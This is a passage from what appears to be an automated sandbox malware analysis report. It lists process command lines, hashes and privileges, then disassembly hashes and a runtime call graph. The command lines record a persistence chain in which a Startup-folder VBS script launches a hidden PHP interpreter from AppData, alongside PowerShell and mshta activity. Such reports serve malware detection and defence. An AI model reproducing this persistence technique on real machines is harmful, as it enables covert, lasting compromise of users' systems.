                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:23
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:24
                                              Start time:04:44:32
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff7498c0000
                                              File size:142'336 bytes
                                              MD5 hash:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:false

                                              General

                                              Target ID:25
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs"
                                              Imagebase:0x7ff6a85a0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:26
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff750320000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:27
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:28
                                              Start time:04:44:49
                                              Start date:05/01/2025
                                              Path:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
                                              Imagebase:0x7ff7498c0000
                                              File size:142'336 bytes
                                              MD5 hash:FA544CF95C1B82AFC25B9C5C55C5AD73
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1656069939.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                Non-executed Functions

                                                Function 00007FFD9B8920FA Relevance: .3, Instructions: 349COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1656069939.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 327d81b09ba21dfccb90c17db93b58cf8aaa192511d573d90f2644e54e7cb94a
                                                • Instruction ID: 9c0fea20272bb3caa4426918eac23f3e9b5bf7a5f8508f50c84add899b6fdb5d
                                                • Opcode Fuzzy Hash: 327d81b09ba21dfccb90c17db93b58cf8aaa192511d573d90f2644e54e7cb94a
                                                • Instruction Fuzzy Hash: 77A1A667B0E7E24FEB265BEC58B50D6BFA0EF5726570E00F7C1C5860A3E91929078361

                                                Executed Functions

                                                Function 000001EB15B20FC1 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1839209835.000001EB15B20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001EB15B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_1eb15b20000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction ID: ab3c8269b8efbb166bca1a8325e3097546d1a1957a860947686773ff3ad6dcb9
                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction Fuzzy Hash: 4A9002144DE88E55D41416915C9529E50416388260FD84480481690544D54D13971262
                                                Function 000001EB15B20FB1 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1839209835.000001EB15B20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001EB15B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_1eb15b20000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction ID: ab3c8269b8efbb166bca1a8325e3097546d1a1957a860947686773ff3ad6dcb9
                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction Fuzzy Hash: 4A9002144DE88E55D41416915C9529E50416388260FD84480481690544D54D13971262
                                                Function 000001EB15B20FB9 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1839209835.000001EB15B20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001EB15B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_1eb15b20000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction ID: ab3c8269b8efbb166bca1a8325e3097546d1a1957a860947686773ff3ad6dcb9
                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction Fuzzy Hash: 4A9002144DE88E55D41416915C9529E50416388260FD84480481690544D54D13971262
                                                Function 000001EB15B20FA9 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1839209835.000001EB15B20000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001EB15B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_1eb15b20000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction ID: ab3c8269b8efbb166bca1a8325e3097546d1a1957a860947686773ff3ad6dcb9
                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                • Instruction Fuzzy Hash: 4A9002144DE88E55D41416915C9529E50416388260FD84480481690544D54D13971262

                                                Executed Functions

                                                Function 00007FFD9B06464B Relevance: .6, Instructions: 581COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e2d25b9b9005b5f175afcc048f3172e1f3f8c42da9bf95366651fa4111d2c04
                                                • Instruction ID: c2574e46b272ec4fb1c0f3c4990599a315b25c29590fb833613d8281a0114a9e
                                                • Opcode Fuzzy Hash: 9e2d25b9b9005b5f175afcc048f3172e1f3f8c42da9bf95366651fa4111d2c04
                                                • Instruction Fuzzy Hash: C0F12762B0FACA4FE7AA966818765B97BD1EF57210B1A02FFD09DC70E3DD086D058341
                                                Function 00007FFD9AF93DF2 Relevance: .4, Instructions: 417COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835251364.00007FFD9AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AF90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9af90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc6dbd5a307579c768b3507b4b8e75d16941c12b3fefabed119a7e64986ddacf
                                                • Instruction ID: a672845da1487320fc7df92b8177206239b7052f1e15f120f4bbeb10bfecae00
                                                • Opcode Fuzzy Hash: fc6dbd5a307579c768b3507b4b8e75d16941c12b3fefabed119a7e64986ddacf
                                                • Instruction Fuzzy Hash: EAD17331A189498FDF98DF5CC495AE9B7E1FFA8304F1442AAE40DD7295DB34E885CB80
                                                Function 00007FFD9B0638CC Relevance: .2, Instructions: 191COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44fdbb0b1e819d7d08ac0294f9571d5f5ab44b58f256f0849647a6f5458b950f
                                                • Instruction ID: a5033588f4ded1d9bfd5c4604796b61ddc23bb8050a0095e290366172acd868a
                                                • Opcode Fuzzy Hash: 44fdbb0b1e819d7d08ac0294f9571d5f5ab44b58f256f0849647a6f5458b950f
                                                • Instruction Fuzzy Hash: 86511353B0FBCE5FE3A5966C18621647BD1EF56250B0A02FBD08DC71E7EC096C459391
                                                Function 00007FFD9B06472A Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27485c094e5d0c12b537507d00e5998160a7410271aa1a9ad779de62b62663c9
                                                • Instruction ID: 4709656bbd6a5444b7ca62f118832a5fb918fb48bda70fb818a000a1d82eca69
                                                • Opcode Fuzzy Hash: 27485c094e5d0c12b537507d00e5998160a7410271aa1a9ad779de62b62663c9
                                                • Instruction Fuzzy Hash: 55410563F0FACB4FF7B996A8047627C66C2EF93650B5A42BED45DC70E2DE0CA9055201
                                                Function 00007FFD9AF943C5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835251364.00007FFD9AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AF90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9af90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f79863b2bbfff3587ba3e0f451e06bf8a109e7aa98808b4dde43dabe4b5a22e
                                                • Instruction ID: e74d50138855a209652c384c1a772f3120e048e61d80d25dae7062d5f7516109
                                                • Opcode Fuzzy Hash: 6f79863b2bbfff3587ba3e0f451e06bf8a109e7aa98808b4dde43dabe4b5a22e
                                                • Instruction Fuzzy Hash: 3B01A73121CB0C4FD748EF4CE051AA5B3E0FB99324F10056DE58AC3691D632E892CB41
                                                Function 00007FFD9B060758 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1835711774.00007FFD9B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B060000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ffd9b060000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68b737486fc3d5f544e7f9eae1d9bf96ac32f6f5b4f2c117da179f5636a0c16e
                                                • Instruction ID: b7b15230e9a1b07de57c42d913e0ad1685babdb27ab87ca8a74221b5d0e4a1df
                                                • Opcode Fuzzy Hash: 68b737486fc3d5f544e7f9eae1d9bf96ac32f6f5b4f2c117da179f5636a0c16e
                                                • Instruction Fuzzy Hash: 68E06823F0E81D2EE7B4E6DC386D1F862C0DF0566170942B7E80CC309AED00AC200380

                                                Execution Graph

                                                Execution Coverage:9.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.2%
                                                Total number of Nodes:1526
                                                Total number of Limit Nodes:41
                                                execution_graph 17115 7ff658e27e20 17116 7ff658e27e49 17115->17116 17117 7ff658e27e38 17115->17117 17119 7ff658e33c44 EnterCriticalSection 17117->17119 17074 7ff658e38a14 17075 7ff658e38a7b 17074->17075 17076 7ff658e38a31 GetModuleHandleW 17074->17076 17084 7ff658e3890c 17075->17084 17076->17075 17082 7ff658e38a3e 17076->17082 17079 7ff658e38abd 17081 7ff658e38acf 17082->17075 17098 7ff658e38b1c GetModuleHandleExW 17082->17098 17104 7ff658e34f54 EnterCriticalSection 17084->17104 17086 7ff658e38928 17087 7ff658e38944 13 API calls 17086->17087 17088 7ff658e38931 17087->17088 17089 7ff658e34fa8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 17088->17089 17090 7ff658e38939 17089->17090 17090->17079 17091 7ff658e38ad0 17090->17091 17105 7ff658e41d28 17091->17105 17094 7ff658e38b0a 17096 7ff658e38b1c 3 API calls 17094->17096 17095 7ff658e38af9 GetCurrentProcess TerminateProcess 17095->17094 17097 7ff658e38b11 ExitProcess 17096->17097 17099 7ff658e38b61 17098->17099 17100 7ff658e38b42 GetProcAddress 17098->17100 17102 7ff658e38b6b FreeLibrary 17099->17102 17103 7ff658e38b71 17099->17103 17100->17099 17101 7ff658e38b59 17100->17101 17101->17099 17102->17103 17103->17075 17106 7ff658e38add 17105->17106 17107 7ff658e41d46 17105->17107 17106->17094 17106->17095 17109 7ff658e3c500 17107->17109 17110 7ff658e3c328 try_get_function 5 API calls 17109->17110 17111 7ff658e3c528 17110->17111 17111->17106 17155 7ff658e3e214 17156 7ff658e3e22b 17155->17156 17157 7ff658e3e24a 17155->17157 17158 7ff658e35e24 _set_errno_from_matherr 13 API calls 17156->17158 17165 7ff658e33c44 EnterCriticalSection 17157->17165 17163 7ff658e3e230 _invalid_parameter_noinfo 17158->17163 17548 7ff658e2adf0 17549 7ff658e2ae5d 17548->17549 17550 7ff658e2ae08 char_traits 17548->17550 17550->17549 17552 7ff658e34030 17550->17552 17553 7ff658e3403e 17552->17553 17554 7ff658e34045 17552->17554 17558 7ff658e33f00 17553->17558 17556 7ff658e34043 17554->17556 17561 7ff658e33ec0 17554->17561 17556->17549 17568 7ff658e33de0 17558->17568 17576 7ff658e33c44 EnterCriticalSection 17561->17576 17575 7ff658e34f54 EnterCriticalSection 17568->17575 18292 7ff658e346e4 18293 7ff658e34729 18292->18293 18294 7ff658e34706 18292->18294 18293->18294 18295 7ff658e3472e 18293->18295 18296 7ff658e35e24 _set_errno_from_matherr 13 API calls 18294->18296 18303 7ff658e33c44 EnterCriticalSection 18295->18303 18300 7ff658e3470b _invalid_parameter_noinfo 18296->18300 19022 7ff658e4a3c8 19023 7ff658e4a3d8 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19022->19023 19026 7ff658e33c50 LeaveCriticalSection 19023->19026 17728 7ff658e39da8 17731 7ff658e39b74 17728->17731 17738 7ff658e34f54 EnterCriticalSection 17731->17738 16564 7ff658e2c7b4 16566 7ff658e2c81a 16564->16566 16565 7ff658e2c869 16566->16565 16567 7ff658e2c85c 16566->16567 16569 7ff658e35d64 90 API calls 16566->16569 16570 7ff658e2c861 16567->16570 16572 7ff658e35d64 16567->16572 16569->16567 16570->16565 16571 7ff658e33ce0 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 61 API calls 16570->16571 16571->16565 16573 7ff658e35ca8 16572->16573 16574 7ff658e35cc5 16573->16574 16576 7ff658e35cf1 16573->16576 16575 7ff658e35e24 _set_errno_from_matherr 13 API calls 16574->16575 16588 7ff658e35cca _invalid_parameter_noinfo 16575->16588 16577 7ff658e35cf6 16576->16577 16578 7ff658e35d03 16576->16578 16579 7ff658e35e24 _set_errno_from_matherr 13 API calls 16577->16579 16589 7ff658e3d200 16578->16589 16579->16588 16582 7ff658e35d17 16584 7ff658e35e24 _set_errno_from_matherr 13 API calls 16582->16584 16583 7ff658e35d24 16596 7ff658e40c58 16583->16596 16584->16588 16586 7ff658e35d38 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16601 7ff658e33c50 LeaveCriticalSection 16586->16601 16588->16570 16602 7ff658e34f54 EnterCriticalSection 16589->16602 16591 7ff658e3d217 16592 7ff658e3d274 16 API calls 16591->16592 16593 7ff658e3d222 16592->16593 16594 7ff658e34fa8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 16593->16594 16595 7ff658e35d0d 16594->16595 16595->16582 16595->16583 16603 7ff658e40998 16596->16603 16598 7ff658e40c7e 16599 7ff658e40cb2 16598->16599 16613 7ff658e473f8 16598->16613 16599->16586 16604 7ff658e409c2 16603->16604 16611 7ff658e40b72 16604->16611 16616 7ff658e46bb8 16604->16616 16605 7ff658e35e24 _set_errno_from_matherr 13 API calls 16606 7ff658e40b7b _invalid_parameter_noinfo 16605->16606 16606->16598 16608 7ff658e40bd3 16609 7ff658e46bb8 30 API calls 16608->16609 16608->16611 16610 7ff658e40bf4 16609->16610 16610->16611 16612 7ff658e46bb8 30 API calls 16610->16612 16611->16605 16611->16606 16612->16611 16627 7ff658e46cb8 16613->16627 16615 7ff658e47425 16615->16599 16617 7ff658e46bc5 16616->16617 16621 7ff658e46bfb 16616->16621 16619 7ff658e35e24 _set_errno_from_matherr 13 API calls 16617->16619 16624 7ff658e46b6c 16617->16624 16618 7ff658e46c25 16620 7ff658e35e24 _set_errno_from_matherr 13 API calls 16618->16620 16622 7ff658e46bcf _invalid_parameter_noinfo 16619->16622 16626 7ff658e46c2a _invalid_parameter_noinfo 16620->16626 16621->16618 16623 7ff658e46c4a 16621->16623 16622->16608 16625 7ff658e35354 TranslateName 30 API calls 16623->16625 16623->16626 16624->16608 16625->16626 16626->16608 16628 7ff658e46ced 16627->16628 16629 7ff658e46ccf 16627->16629 16628->16629 16632 7ff658e46d09 16628->16632 16630 7ff658e35e24 _set_errno_from_matherr 13 API calls 16629->16630 16631 7ff658e46cd4 _invalid_parameter_noinfo 16630->16631 16631->16615 16636 7ff658e472e0 16632->16636 16637 7ff658e35354 TranslateName 30 API calls 16636->16637 16638 7ff658e47333 16637->16638 16640 7ff658e47343 16638->16640 16713 7ff658e3c550 16638->16713 16648 7ff658e38428 16640->16648 16643 7ff658e4739b 16645 7ff658e46d34 16643->16645 16646 7ff658e3c1cc __free_lconv_mon 13 API calls 16643->16646 16645->16631 16647 7ff658e43854 LeaveCriticalSection 16645->16647 16646->16645 16649 7ff658e38451 16648->16649 16650 7ff658e38473 16648->16650 16653 7ff658e3845f 16649->16653 16655 7ff658e3c1cc __free_lconv_mon 13 API calls 16649->16655 16651 7ff658e38477 16650->16651 16652 7ff658e384cc 16650->16652 16651->16653 16657 7ff658e3848b 16651->16657 16659 7ff658e3c1cc __free_lconv_mon 13 API calls 16651->16659 16654 7ff658e419f4 _Wcsftime MultiByteToWideChar 16652->16654 16653->16643 16670 7ff658e4742c 16653->16670 16656 7ff658e384e7 16654->16656 16655->16653 16658 7ff658e384ee GetLastError 16656->16658 16666 7ff658e3c1cc __free_lconv_mon 13 API calls 16656->16666 16668 7ff658e3851b 16656->16668 16669 7ff658e38527 16656->16669 16660 7ff658e3f734 _fread_nolock 14 API calls 16657->16660 16716 7ff658e35db4 16658->16716 16659->16657 16660->16653 16662 7ff658e384fb 16665 7ff658e35e24 _set_errno_from_matherr 13 API calls 16662->16665 16663 7ff658e419f4 _Wcsftime MultiByteToWideChar 16664 7ff658e3856f 16663->16664 16664->16653 16664->16658 16665->16653 16666->16668 16667 7ff658e3f734 _fread_nolock 14 API calls 16667->16669 16668->16667 16669->16653 16669->16663 16721 7ff658e47010 16670->16721 16673 7ff658e474b9 16735 7ff658e4387c 16673->16735 16674 7ff658e474a1 16747 7ff658e35e04 16674->16747 16682 7ff658e35e24 _set_errno_from_matherr 13 API calls 16686 7ff658e474b2 16682->16686 16686->16643 16704 7ff658e4769b 16774 7ff658e3d118 16704->16774 16705 7ff658e476dc 16705->16686 16707 7ff658e4775c CloseHandle CreateFileW 16705->16707 16708 7ff658e477a3 GetLastError 16707->16708 16712 7ff658e476a2 16707->16712 16709 7ff658e35db4 _fread_nolock 13 API calls 16708->16709 16710 7ff658e477b0 16709->16710 16815 7ff658e439bc 16710->16815 16712->16686 16714 7ff658e3c328 try_get_function 5 API calls 16713->16714 16715 7ff658e3c570 16714->16715 16715->16640 16717 7ff658e3c0a0 _set_errno_from_matherr 13 API calls 16716->16717 16718 7ff658e35dc5 16717->16718 16719 7ff658e3c0a0 _set_errno_from_matherr 13 API calls 16718->16719 16720 7ff658e35dde _fread_nolock 16719->16720 16720->16662 16722 7ff658e4703c 16721->16722 16724 7ff658e4704b _invalid_parameter_noinfo 16721->16724 16723 7ff658e35e24 _set_errno_from_matherr 13 API calls 16722->16723 16722->16724 16723->16724 16726 7ff658e470cb _invalid_parameter_noinfo 16724->16726 16730 7ff658e35e24 _set_errno_from_matherr 13 API calls 16724->16730 16725 7ff658e4711f _invalid_parameter_noinfo 16731 7ff658e47186 16725->16731 16824 7ff658e398e8 16725->16824 16726->16725 16728 7ff658e35e24 _set_errno_from_matherr 13 API calls 16726->16728 16728->16725 16729 7ff658e47182 16729->16731 16732 7ff658e47204 16729->16732 16730->16726 16731->16673 16731->16674 16733 7ff658e3364c _invalid_parameter_noinfo_noreturn 17 API calls 16732->16733 16734 7ff658e47219 16733->16734 16828 7ff658e34f54 EnterCriticalSection 16735->16828 16748 7ff658e3c0a0 _set_errno_from_matherr 13 API calls 16747->16748 16749 7ff658e35e0d 16748->16749 16749->16682 16775 7ff658e43a78 _Fputc 13 API calls 16774->16775 16778 7ff658e3d12c 16775->16778 16776 7ff658e3d132 16777 7ff658e439bc Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 14 API calls 16776->16777 16781 7ff658e3d197 16777->16781 16778->16776 16779 7ff658e43a78 _Fputc 13 API calls 16778->16779 16788 7ff658e3d16f 16778->16788 16782 7ff658e3d162 16779->16782 16780 7ff658e43a78 _Fputc 13 API calls 16783 7ff658e3d17b CloseHandle 16780->16783 16786 7ff658e35db4 _fread_nolock 13 API calls 16781->16786 16787 7ff658e3d1c3 16781->16787 16784 7ff658e43a78 _Fputc 13 API calls 16782->16784 16783->16776 16785 7ff658e3d188 GetLastError 16783->16785 16784->16788 16785->16776 16786->16787 16787->16712 16788->16776 16788->16780 16800 7ff658e46f1d 16802 7ff658e35e24 _set_errno_from_matherr 13 API calls 16800->16802 16804 7ff658e46f22 16802->16804 16804->16704 16804->16705 16805 7ff658e46ef0 16805->16800 16805->16804 17051 7ff658e3dce0 16805->17051 16816 7ff658e439d8 16815->16816 16817 7ff658e43a4a 16815->16817 16816->16817 16823 7ff658e43a0b Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 16816->16823 16818 7ff658e35e24 _set_errno_from_matherr 13 API calls 16817->16818 16819 7ff658e43a4f 16818->16819 16820 7ff658e35e04 _fread_nolock 13 API calls 16819->16820 16821 7ff658e43a3c 16820->16821 16821->16712 16822 7ff658e43a34 SetStdHandle 16822->16821 16823->16821 16823->16822 16825 7ff658e398f1 16824->16825 16827 7ff658e398f6 _invalid_parameter_noinfo 16824->16827 16826 7ff658e35e24 _set_errno_from_matherr 13 API calls 16825->16826 16826->16827 16827->16729 17052 7ff658e3dd09 17051->17052 17053 7ff658e3dd21 17051->17053 17054 7ff658e35e04 _fread_nolock 13 API calls 17052->17054 17055 7ff658e3dd98 17053->17055 17059 7ff658e3dd52 17053->17059 17057 7ff658e3dd0e 17054->17057 17056 7ff658e35e04 _fread_nolock 13 API calls 17055->17056 17058 7ff658e3dd9d 17056->17058 17060 7ff658e35e24 _set_errno_from_matherr 13 API calls 17057->17060 17061 7ff658e35e24 _set_errno_from_matherr 13 API calls 17058->17061 17073 7ff658e4376c EnterCriticalSection 17059->17073 17063 7ff658e3dd16 _invalid_parameter_noinfo 17060->17063 17061->17063 17063->16805 17064 7ff658e3dd59 17065 7ff658e3dd69 17064->17065 17066 7ff658e3dd7e 17064->17066 17067 7ff658e35e24 _set_errno_from_matherr 13 API calls 17065->17067 17068 7ff658e3ddcc _Fputc 54 API calls 17066->17068 17069 7ff658e3dd6e 17067->17069 17070 7ff658e3dd79 17068->17070 17071 7ff658e35e04 _fread_nolock 13 API calls 17069->17071 17072 7ff658e43854 _fread_nolock LeaveCriticalSection 17070->17072 17071->17070 17072->17063 19087 7ff658e33ba0 19088 7ff658e33bab 19087->19088 19096 7ff658e3cc94 19088->19096 19109 7ff658e34f54 EnterCriticalSection 19096->19109 17911 7ff658e3bda4 17912 7ff658e3bda9 17911->17912 17916 7ff658e3bdbe 17911->17916 17917 7ff658e3bdc4 17912->17917 17918 7ff658e3be06 17917->17918 17919 7ff658e3be0e 17917->17919 17920 7ff658e3c1cc __free_lconv_mon 13 API calls 17918->17920 17921 7ff658e3c1cc __free_lconv_mon 13 API calls 17919->17921 17920->17919 17922 7ff658e3be1b 17921->17922 17923 7ff658e3c1cc __free_lconv_mon 13 API calls 17922->17923 17924 7ff658e3be28 17923->17924 17925 7ff658e3c1cc __free_lconv_mon 13 API calls 17924->17925 17926 7ff658e3be35 17925->17926 17927 7ff658e3c1cc __free_lconv_mon 13 API calls 17926->17927 17928 7ff658e3be42 17927->17928 17929 7ff658e3c1cc __free_lconv_mon 13 API calls 17928->17929 17930 7ff658e3be4f 17929->17930 17931 7ff658e3c1cc __free_lconv_mon 13 API calls 17930->17931 17932 7ff658e3be5c 17931->17932 17933 7ff658e3c1cc __free_lconv_mon 13 API calls 17932->17933 17934 7ff658e3be69 17933->17934 17935 7ff658e3c1cc __free_lconv_mon 13 API calls 17934->17935 17936 7ff658e3be79 17935->17936 17937 7ff658e3c1cc __free_lconv_mon 13 API calls 17936->17937 17938 7ff658e3be89 17937->17938 17943 7ff658e3bc74 17938->17943 17957 7ff658e34f54 EnterCriticalSection 17943->17957 19542 7ff658e3f48c 19543 7ff658e3f4b5 19542->19543 19548 7ff658e3f4cd 19542->19548 19544 7ff658e35e04 _fread_nolock 13 API calls 19543->19544 19546 7ff658e3f4ba 19544->19546 19545 7ff658e3f547 19547 7ff658e35e04 _fread_nolock 13 API calls 19545->19547 19549 7ff658e35e24 _set_errno_from_matherr 13 API calls 19546->19549 19550 7ff658e3f54c 19547->19550 19548->19545 19551 7ff658e3f4fe 19548->19551 19554 7ff658e3f4c2 _invalid_parameter_noinfo 19549->19554 19552 7ff658e35e24 